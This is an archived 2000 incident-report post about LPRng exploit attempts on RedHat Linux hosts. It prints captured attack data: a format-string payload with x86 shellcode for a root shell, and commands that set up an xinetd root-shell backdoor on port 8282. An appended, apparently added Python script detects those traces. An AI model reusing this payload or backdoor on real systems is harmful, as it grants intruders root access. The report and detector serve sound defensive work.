Security Incidents mailing list archives
LPRng exploits
From: Kathy Bergsma <kathya () nersp nerdc ufl edu>
Date: Wed, 29 Nov 2000 15:29:12 -0500
Port 515 on our network was scanned from uiowa.edu over the weekend. Here's some information on the LPRng exploits attempted against several RedHat Linux 7.x hosts.

The intruder attempts to create a file called /dev/whoa/reg. It looks like they intend for reg to open port 8282 with root privileges. They then edit the xinetd.conf file and restart xinetd to open the port. Evidence of these changes was cleared from compromised hosts once the intruder installed his kit. A password-protected guest account with a GID of 0 was created on one compromised host. The following files were also changed: du, find, ls, netstat, passwd, ping, psr, and su.

Shown below is session data from the exploit. Shown first is the format string used to execute a root shell. Shown after that are the commands executed from the shell.

--
Kathy Bergsma
Network Security Coordinator

BB{E0}{F3}{FF}{BF}{E1}{F3}{FF}{BF}{E2}{F3}{FF}{BF}{E3}{F3}{FF}{BF}XXXXXXXXXXXXXXXXXX%.160u%300$n%.17u%301$nse curity%302$n%.192u%303$n{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90} {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90} {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90} {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90} {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90} {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90} {90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}{90}1{DB}1{C9}1{C0}{B0}F{CD}{80}{89}{E5}1{D2} {B2}f{89}{D0}1{C9}{89}{CB}C{89}]{F8}C{89}]{F4}K{89}M{FC}{8D}M{F4}{CD}{80}1{C9}{89}E{F4}Cf{89}]{EC}f{C7}E{EE}{F}'{89}M{F0} 
{8D}E{EC}{89}E{F8}{C6}E{FC}{10}{89}{D0}{8D}M{F4}{CD}{80}{89}{D0}CC{CD}{80}{89}{D0}C{CD}{80}{89}{C3}1{C9}{B2}?{89}{D0}{CD} {80}{89}{D0}A{CD}{80}{EB}{18}^{89}u{8}1{C0}{88}F{7}{89}E{C}{B0}{B}{89}{F3}{8D}M{8}{8D}U{C}{CD}{80}{E8}{E3}{FF}{FF}{FF} /bin/sh{A} mkdir /dev/whoa ; echo "service reg" > > /dev/whoa/reg ; echo "{" >
/dev/whoa/reg; echo "socket_type = stream" > /dev/whoa/reg;{D}{A}
echo "port = 8282" > > /dev/whoa/reg; echo "protocol = tcp" > > /dev/whoa/reg; echo "wait = no" > > /dev/whoa/reg;{D}{A} echo "user = root" > > /dev/whoa/reg ; echo "server = /bin/sh" > > /dev/whoa/reg ; echo "server_args = -i" > > /dev/whoa/reg;{D} {A} echo "}" > > /dev/whoa/reg ; echo "includedir /dev/whoa" > > /etc/xinetd.conf ; nohup /etc/rc.d/init.d/xinetd restart > > /dev /null 2 > > /dev/null;{D}{A}
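The persistence mechanism in the session above leaves three things on disk that can be checked for mechanically: an includedir line in /etc/xinetd.conf pointing somewhere other than the normal configuration directory, a service definition whose server is a shell run as root, and a passwd entry with GID 0 that is not root. The following Python script is an added example for this archive page, not code from the original post. It parses xinetd-style service blocks and includedir directives and reports those patterns. The allowed include directory, the list of shell interpreters and every sample input are assumptions constructed to mirror the report.

```python
"""Hypothetical detector for the xinetd backdoor pattern in the report.

Added example, not code from the original post. Parses xinetd-style
service definitions and includedir lines and flags the combination the
report describes. All sample inputs are constructed.
"""
import re

# Constructed sample: the service file the report's echo commands would produce.
SAMPLE_REG = """service reg
{
socket_type = stream
port = 8282
protocol = tcp
wait = no
user = root
server = /bin/sh
server_args = -i
}
"""

# Constructed sample xinetd.conf with the extra includedir line appended.
SAMPLE_XINETD_CONF = """defaults
{
    log_type = SYSLOG daemon info
}
includedir /etc/xinetd.d
includedir /dev/whoa
"""

# Constructed sample /etc/passwd excerpt with a GID-0 guest account.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
guest:x:1001:0::/home/guest:/bin/bash
"""

# Assumptions: where xinetd is expected to include from, and which
# interpreters count as shells. Adjust to the host's real configuration.
ALLOWED_INCLUDE_DIRS = ("/etc/xinetd.d",)
SHELLS = {"/bin/sh", "/bin/bash", "/bin/csh", "/bin/tcsh", "/bin/ksh"}

SERVICE_RE = re.compile(r"service\s+(\S+)\s*\{(.*?)\}", re.S)


def parse_services(text):
    """Return {service_name: {attribute: value}} for every service block."""
    services = {}
    for match in SERVICE_RE.finditer(text):
        name, body = match.group(1), match.group(2)
        attrs = {}
        for line in body.splitlines():
            line = line.strip()
            if "=" in line and not line.startswith("#"):
                key, value = line.split("=", 1)
                attrs[key.strip()] = value.strip()
        services[name] = attrs
    return services


def includedirs(conf_text):
    """Return every directory named by an includedir directive."""
    dirs = []
    for line in conf_text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0] == "includedir":
            dirs.append(parts[1].strip())
    return dirs


def suspicious_includedirs(conf_text):
    """Include directories outside the expected location, e.g. /dev/whoa."""
    return [d for d in includedirs(conf_text) if d not in ALLOWED_INCLUDE_DIRS]


def suspicious_services(text):
    """Return (name, port, reasons) for services that look like bound shells."""
    findings = []
    for name, attrs in parse_services(text).items():
        reasons = []
        if attrs.get("server", "") in SHELLS:
            reasons.append("server is a shell")
            if attrs.get("user") == "root":
                reasons.append("shell runs as root")
        if "-i" in attrs.get("server_args", "").split():
            reasons.append("interactive server_args")
        if reasons:
            findings.append((name, attrs.get("port"), reasons))
    return findings


def gid0_accounts(passwd_text):
    """Account names other than root whose primary GID is 0."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 4 and fields[3] == "0" and fields[0] != "root":
            names.append(fields[0])
    return names


if __name__ == "__main__":
    print("includedir:", suspicious_includedirs(SAMPLE_XINETD_CONF))
    print("services:", suspicious_services(SAMPLE_REG))
    print("gid0:", gid0_accounts(SAMPLE_PASSWD))
```

On a real host the three functions would be fed the contents of /etc/xinetd.conf, every file under each included directory, and /etc/passwd; because the report notes that the intruder's kit removed this evidence after installation, the check is most useful when run from a known-good rescue environment or against a copy of the disk rather than with the host's own (possibly replaced) ls, find and passwd binaries.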